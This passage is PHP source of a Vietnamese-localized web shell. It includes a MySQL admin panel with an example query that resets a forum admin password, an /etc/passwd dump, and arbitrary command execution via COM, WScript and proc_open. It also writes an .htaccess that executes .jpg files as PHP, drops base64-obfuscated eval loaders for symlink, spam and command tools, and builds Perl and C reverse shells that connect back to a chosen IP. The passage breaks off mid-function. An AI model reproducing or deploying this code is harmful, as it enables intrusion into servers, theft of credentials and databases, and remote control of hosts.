p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">T&#7843;i Xu&#7889;ng</a> - <a href="javascript:dofile(\'delfiles\');"> X&#243;a File </a></td><td colspan="4" align="right">'.$dir_i.' Th&#432; M&#7909;c / '.$file_i.' Files</td></tr>');
p('</form></table>');
}
;echo '<script type="text/javascript">
function mysqlfile(doing){
        if(!doing) return;
        $(\'doing\').value=doing;
        $(\'mysqlfile\').dbhost.value=$(\'dbinfo\').dbhost.value;
        $(\'mysqlfile\').dbport.value=$(\'dbinfo\').dbport.value;
        $(\'mysqlfile\').dbuser.value=$(\'dbinfo\').dbuser.value;
        $(\'mysqlfile\').dbpass.value=$(\'dbinfo\').dbpass.value;
        $(\'mysqlfile\').dbname.value=$(\'dbinfo\').dbname.value;
        $(\'mysqlfile\').charset.value=$(\'dbinfo\').charset.value;
        $(\'mysqlfile\').submit();
}
</script>
';
if ($action == 'sqladmin') {
!$dbhost &&$dbhost = 'localhost';
!$dbuser &&$dbuser = 'HandS Team';
!$dbport &&$dbport = '3306';
$dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
if(isset($dbhost)){
$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
}
if(isset($dbuser)) {
$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
}
if(isset($dbpass)) {
$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
}
if(isset($dbport)) {
$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
}
if(isset($dbname)) {
$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
}
if(isset($charset)) {
$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
}
if ($doing == 'backupmysql'&&$saveasfile) {
if (!$table) {
m('Please choose the table');
}else {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$table = array_flip($table);
$fp = @fopen($path,'w');
if ($fp) {
$result = q('SHOW tables');
if (!$result) p('<h2>'.mysql_error().'</h2>');
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0],$fp);
}
}
fclose($fp);
$fileurl = str_replace(SA_ROOT,'',$path);
m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
mysql_close();
}else {
m('Backup failed');
}
}
}
if ($insert &&$insertsql) {
$keystr = $valstr = $tmp = '';
foreach($insertsql as $key =>$val) {
if ($val) {
$keystr .= $tmp.$key;
$valstr .= $tmp."'".addslashes($val)."'";
$tmp = ',';
}
}
if ($keystr &&$valstr) {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ?'Insert new record of success': mysql_error());
}
}
if ($update &&$insertsql &&$base64) {
$valstr = $tmp = '';
foreach($insertsql as $key =>$val) {
$valstr .= $tmp.$key."='".addslashes($val)."'";
$tmp = ',';
}
if ($valstr) {
$where = base64_decode($base64);
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ?'Record updating': mysql_error());
}
}
if ($doing == 'del'&&$base64) {
$where = base64_decode($base64);
$delete_sql = "DELETE FROM $tablename WHERE $where";
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("DELETE FROM $tablename WHERE $where") ?'Deletion record of success': mysql_error());
}
if ($tablename &&$doing == 'drop') {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
if (q("DROP TABLE $tablename")) {
m('Drop table of success');
$tablename = '';
}else {
m(mysql_error());
}
}
$charsets = array(''=>'Default','gbk'=>'GBK','big5'=>'Big5','utf8'=>'UTF-8','latin1'=>'Latin1');
formhead(array('title'=>'MYSQL Qu&#7843;n L&#253; '));
makehide('action','sqladmin');
p('<p>');
p('DBHost:');
makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
p(':');
makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
p('DBUser:');
makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
p('DBPass:');
makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
p('DBCharset:');
makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
p('</p>');
formfoot();
;echo '<script type="text/javascript">
function editrecord(action, base64, tablename){
        if (action == \'del\') {
                if (!confirm(\'Is or isn\\\'t deletion record?\')) return;
        }
        $(\'recordlist\').doing.value=action;
        $(\'recordlist\').base64.value=base64;
        $(\'recordlist\').tablename.value=tablename;
        $(\'recordlist\').submit();
}
function moddbname(dbname) {
        if(!dbname) return;
        $(\'setdbname\').dbname.value=dbname;
        $(\'setdbname\').submit();
}
function settable(tablename,doing,page) {
        if(!tablename) return;
        if (doing) {
                $(\'settable\').doing.value=doing;
        }
        if (page) {
                $(\'settable\').page.value=page;
        }
        $(\'settable\').tablename.value=tablename;
        $(\'settable\').submit();
}
</script>
';
formhead(array('name'=>'recordlist'));
makehide('doing');
makehide('action','sqladmin');
makehide('base64');
makehide('tablename');
p($dbform);
formfoot();
formhead(array('name'=>'setdbname'));
makehide('action','sqladmin');
p($dbform);
if (!$dbname) {
makehide('dbname');
}
formfoot();
formhead(array('name'=>'settable'));
makehide('action','sqladmin');
p($dbform);
makehide('tablename');
makehide('page',$page);
makehide('doing');
formfoot();
$cachetables = array();
$pagenum = 30;
$page = intval($page);
if($page) {
$start_limit = ($page -1) * $pagenum;
}else {
$start_limit = 0;
$page = 1;
}
if (isset($dbhost) &&isset($dbuser) &&isset($dbpass) &&isset($connect)) {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$mysqlver = mysql_get_server_info();
p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
$highver = $mysqlver >'4.1'?1 : 0;
$query = q("SHOW DATABASES");
$dbs = array();
$dbs[] = 'Ch&#7885;n M&#7897;t C&#417; S&#7903; D&#7919; Li&#7879;u';
while($db = mysql_fetch_array($query)) {
$dbs[$db['Database']] = $db['Database'];
}
makeselect(array('title'=>'H&#227;y Ch&#7885;n M&#7897;t C&#417; S&#7903; D&#7919; Li&#7879;u','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
$tabledb = array();
if ($dbname) {
p('<p>');
p('Dababase Hi&#7879;n T&#7841;i: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
if ($tablename) {
p(' | Table Hi&#7879;n T&#7841;i: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
}
p('</p>');
mysql_select_db($dbname);
$getnumsql = '';
$runquery = 0;
if ($sql_query) {
$runquery = 1;
}
$allowedit = 0;
if ($tablename &&!$sql_query) {
$sql_query = "SELECT * FROM $tablename";
$getnumsql = $sql_query;
$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
$allowedit = 1;
}
p('<form action="'.$self.'" method="POST">');
p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Ch&#7841;y Truy V&#7845;n Sql/Tr&#234;n C&#417; S&#7903; D&#7919; Li&#7879;u  <font color=red><b>'.$dbname.'</font></b>:<BR>V&#361; D&#7909; M&#7853;t Kh&#7849;u VBB <font color=red>Marion001</font><BR><font color=yellow>UPDATE `user` SET `password` = \'20ec508bb4a6c454615f3414f6b47376\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
                        </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
makehide('tablename',$tablename);
makehide('action','sqladmin');
p($dbform);
p('</form>');
if ($tablename ||($runquery &&$sql_query)) {
if ($doing == 'structure') {
$result = q("SHOW COLUMNS FROM $tablename");
$rowdb = array();
while($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
p('<table border="0" cellpadding="3" cellspacing="0">');
p('<tr class="head">');
p('<td>Field</td>');
p('<td>Type</td>');
p('<td>Null</td>');
p('<td>Key</td>');
p('<td>Default</td>');
p('<td>Extra</td>');
p('</tr>');
foreach ($rowdb as $row) {
$thisbg = bg();
p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
p('<td>'.$row['Field'].'</td>');
p('<td>'.$row['Type'].'</td>');
p('<td>'.$row['Null'].'&nbsp;</td>');
p('<td>'.$row['Key'].'&nbsp;</td>');
p('<td>'.$row['Default'].'&nbsp;</td>');
p('<td>'.$row['Extra'].'&nbsp;</td>');
p('</tr>');
}
tbfoot();
}elseif ($doing == 'insert'||$doing == 'edit') {
$result = q('SHOW COLUMNS FROM '.$tablename);
while ($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
$rs = array();
if ($doing == 'insert') {
p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
}else {
p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
$where = base64_decode($base64);
$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
$rs = mysql_fetch_array($result);
}
p('<form method="post" action="'.$self.'">');
p($dbform);
makehide('action','sqladmin');
makehide('tablename',$tablename);
p('<table border="0" cellpadding="3" cellspacing="0">');
foreach ($rowdb as $row) {
if ($rs[$row['Field']]) {
$value = htmlspecialchars($rs[$row['Field']]);
}else {
$value = '';
}
$thisbg = bg();
p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
}
if ($doing == 'insert') {
p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
}else {
p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
makehide('base64',$base64);
}
p('</table></form>');
}else {
$querys = @explode(';',$sql_query);
foreach($querys as $num=>$query) {
if ($query) {
p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
switch(qy($query))
{
case 0:
p('<h2>Error : '.mysql_error().'</h2>');
break;
case 1:
if (strtolower(substr($query,0,13)) == 'select * from') {
$allowedit = 1;
}
if ($getnumsql) {
$tatol = mysql_num_rows(q($getnumsql));
$multipage = multi($tatol,$pagenum,$page,$tablename);
}
if (!$tablename) {
$sql_line = str_replace(array("\r","\n","\t"),array(' ',' ',' '),trim(htmlspecialchars($query)));
$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i"," ",$sql_line);
preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
$tablename = $matches[1][0];
}
$result = q($query);
p($multipage);
p('<table border="0" cellpadding="3" cellspacing="0">');
p('<tr class="head">');
if ($allowedit) p('<td>Ch&#7881;nh S&#7917;a</td>');
$fieldnum = @mysql_num_fields($result);
for($i=0;$i<$fieldnum;$i++){
$name = @mysql_field_name($result,$i);
$type = @mysql_field_type($result,$i);
$len = @mysql_field_len($result,$i);
p("<td nowrap>$name<br><span>$type($len)</span></td>");
}
p('</tr>');
while($mn = @mysql_fetch_assoc($result)){
$thisbg = bg();
p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
$where = $tmp = $b1 = '';
foreach($mn as $key=>$inside){
if ($inside) {
$where .= $tmp.$key."='".addslashes($inside)."'";
$tmp = ' AND ';
}
$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
}
$where = base64_encode($where);
if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">S&#7917;a</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">X&#243;a</a></td>');
p($b1);
p('</tr>');
unset($b1);
}
tbfoot();
p($multipage);
break;
case 2:
$ar = mysql_affected_rows();
p('<h2>affected rows : <b>'.$ar.'</b></h2>');
break;
}
}
}
}
}else {
$query = q("SHOW TABLE STATUS");
$table_num = $table_rows = $data_size = 0;
$tabledb = array();
while($table = mysql_fetch_array($query)) {
$data_size = $data_size +$table['Data_length'];
$table_rows = $table_rows +$table['Rows'];
$table['Data_length'] = sizecount($table['Data_length']);
$table_num++;
$tabledb[] = $table;
}
$data_size = sizecount($data_size);
unset($table);
p('<table border="0" cellpadding="0" cellspacing="0">');
p('<form action="'.$self.'" method="POST">');
makehide('action','sqladmin');
p($dbform);
p('<tr class="head">');
p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
p('<td>Name</td>');
p('<td>Rows</td>');
p('<td>Data_length</td>');
p('<td>Create_time</td>');
p('<td>Update_time</td>');
if ($highver) {
p('<td>Engine</td>');
p('<td>Collation</td>');
}
p('</tr>');
foreach ($tabledb as $key =>$table) {
$thisbg = bg();
p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
p('<td>'.$table['Rows'].'</td>');
p('<td>'.$table['Data_length'].'</td>');
p('<td>'.$table['Create_time'].'</td>');
p('<td>'.$table['Update_time'].'</td>');
if ($highver) {
p('<td>'.$table['Engine'].'</td>');
p('<td>'.$table['Collation'].'</td>');
}
p('</tr>');
}
p('<tr class=fout>');
p('<td>&nbsp;</td>');
p('<td>Total tables: '.$table_num.'</td>');
p('<td>'.$table_rows.'</td>');
p('<td>'.$data_size.'</td>');
p('<td colspan="'.($highver ?4 : 2).'">&nbsp;</td>');
p('</tr>');
p("<tr class=\"fout\"><td colspan=\"".($highver ?8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> T&#7843;i Xu&#7889;ng File <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
makehide('doing','backupmysql');
formfoot();
p("</table>");
fr($query);
}
}
}
tbfoot();
@mysql_close();
}
elseif ($action == 'etcpwd') {
formhead(array('title'=>'Get /etc/passwd'));
makehide('action','etcpwd');
makehide('dir',$nowpath);
$i = 0;
echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
while ($i <60000) {
$line = posix_getpwuid($i);
if (!empty($line)) {
while (list ($key,$vba_etcpwd) = each($line)){
echo "".$vba_etcpwd."\n";
break;
}
}
$i++;
}
echo "</textarea></p>";
formfoot();
}
elseif ($action == 'command') {
if (IS_WIN &&IS_COM) {
if($program &&$parameter) {
$shell= new COM('Shell.Application');
$a = $shell->ShellExecute($program,$parameter);
m('Program run has '.(!$a ?'success': 'fail'));
}
!$program &&$program = 'c:\windows\system32\cmd.exe';
!$parameter &&$parameter = '/c net start > '.SA_ROOT.'log.txt';
formhead(array('title'=>'Execute Program'));
makehide('action','shell');
makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
p('<p>');
makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
p('</p>');
formfoot();
}
formhead(array('title'=>'Execute Command'));
makehide('action','shell');
if (IS_WIN &&IS_COM) {
$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
}
p('<p>');
makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
p('</p>');
formfoot();
if ($command) {
p('<hr width="100%" noshade /><pre>');
if ($execfunc=='wscript'&&IS_WIN &&IS_COM) {
$wsh = new COM('WScript.shell');
$exec = $wsh->exec('cmd.exe /c '.$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
}elseif ($execfunc=='proc_open'&&IS_WIN &&IS_COM) {
$descriptorspec = array(
0 =>array('pipe','r'),
1 =>array('pipe','w'),
2 =>array('pipe','w')
);
$process = proc_open($_SERVER['COMSPEC'],$descriptorspec,$pipes);
if (is_resource($process)) {
fwrite($pipes[0],$command."\r\n");
fwrite($pipes[0],"exit\r\n");
fclose($pipes[0]);
while (!feof($pipes[1])) {
echo fgets($pipes[1],1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2],1024);
}
fclose($pipes[2]);
proc_close($process);
}
}else {
echo(execute($command));
}
p('</pre>');
}
}
elseif ($action == 'error.log') {
mkdir('error',0755);
chdir('error');
$kokdosya = ".htaccess";
$dosya_adi = "$kokdosya";
$dosya = fopen ($dosya_adi ,'w') or die ("Can not open file!");
$metin = "Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script log cgi pl tg love h4 tgb x-zone
AddType application/x-httpd-php .jpg
RewriteEngine on
RewriteRule (.*)\.war$ .log
## END ##";
fwrite ( $dosya ,$metin ) ;
fclose ($dosya);
$pythonp = '
';
$file = fopen("error.log","w+");
$write = fwrite ($file ,base64_decode($pythonp));
fclose($file);
chmod("error.log",0755);
echo "<iframe src=error/error.log width=100% height=720px frameborder=0></iframe> ";
}
elseif ($action == 'jump') {
$file = fopen($dir."jump.php","w+");
$perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVll4WmpsbVVVVlhKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
';
$file = fopen("jump.php","w+");
$write = fwrite ($file ,base64_decode($perltoolss));
fclose($file);
echo "<iframe src=jump.php width=100% height=720px frameborder=0></iframe> ";
}

elseif ($action == 'ddos') {
    $file = fopen($dir . "kwddos.php", "w+");
    $perltoolss = '';
    $file = fopen("kwddos.php", "w+");
    $write = fwrite($file, base64_decode($perltoolss));
    fclose($file);
    echo "<iframe src=kwddos.php width=100% height=720px frameborder=0></iframe> ";
}

elseif ($action == 'symlink') {
$file = fopen($dir."symlink.php","w+");
$perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVU42WWxSeWNqUjRKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
';
$file = fopen("symlink.php","w+");
$write = fwrite ($file ,base64_decode($perltoolss));
fclose($file);
echo "<iframe src=symlink.php width=100% height=720px frameborder=0></iframe> ";
}
elseif ($action == 'newcommand') {
$file = fopen($dir."command.php","w+");
$perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQWG8zU0ZSWldGVjZKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
';
$file = fopen("command.php","w+");
$write = fwrite ($file ,base64_decode($perltoolss));
fclose($file);
echo "<iframe src=command.php width=100% height=700px frameborder=0></iframe> ";
}
elseif ($action == 'backconnect') {!$yourip &&$yourip = $_SERVER['REMOTE_ADDR'];!$yourport &&$yourport = '7777';$usedb = array('perl'=>'perl','c'=>'c');$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj"."aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR"."hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT"."sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI"."kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi"."KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl"."OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC"."BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb"."SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd"."KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ"."sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC"."Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D"."QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp"."Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";if ($start &&$yourip &&$yourport &&$use){if ($use == 'perl') {cf('/tmp/angel_bc',$back_connect);$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");}else {cf('/tmp/angel_bc.c',$back_connect_c);$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');@unlink('/tmp/angel_bc.c');$res = execute("/tmp/angel_bc $yourip $yourport &");}m("Now script try connect to $yourip port $yourport ...");}formhead(array('title'=>'Command : nc -vv -l -p 7777'));makehide('action','backconnect');p('
');p('Your IP:');makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));p('Your Port:');makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));p('Use:');makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));p('
 
');formfoot();}
elseif ($action == 'spam') {
$file = fopen($dir."spam.php","w+");
$perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQV3RVYzJwVVZFeFlKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4KPHAgY2xhc3M9InN0eWxlMiI+CjxpbWcgYm9yZGVyPSIwIiBzcmM9Imh0dHBzOi8vZmJjZG4tc3Bob3Rvcy1mLWEuYWthbWFpaGQubmV0L2hwaG90b3MtYWsteHBmMS92L3QxLjAtOS8xMDU1NzQ3Ml82NzU3NjE0NjkxNzc2MDNfODE3NjExNDQ0MjY2MzA5MzY3OV9uLmpwZz9vaD0xMjA4ODNmNWIyMDUxMmNjZmIwNjRmMTc0MWQwZmRjYSZvZT01NDc5NkZGMyZfX2dkYV9fPTE0MTczMDYyNjVfY2U2YmZhYzg3NzdhMDA5ODEyMDE3YTRkYjRmNTQyOTAiIHdpZHRoPSIyNyIgaGVpZ2h0PSIzMCIgIGFsdD0iTGludXgiIC8+PC9wPgo8cCBjbGFzcz0ic3R5bGUxIj4mbmJzcDs8L3A+CjwvYm9keT4KPC9odG1sPg==
';
$file = fopen("spam.php","w+");
$write = fwrite ($file ,base64_decode($perltoolss));
fclose($file);
echo "<iframe src=spam.php width=100% height=720px frameborder=0></iframe> ";
}
elseif ($action == 'leech') {
$file = fopen($dir."leech.php","w+");
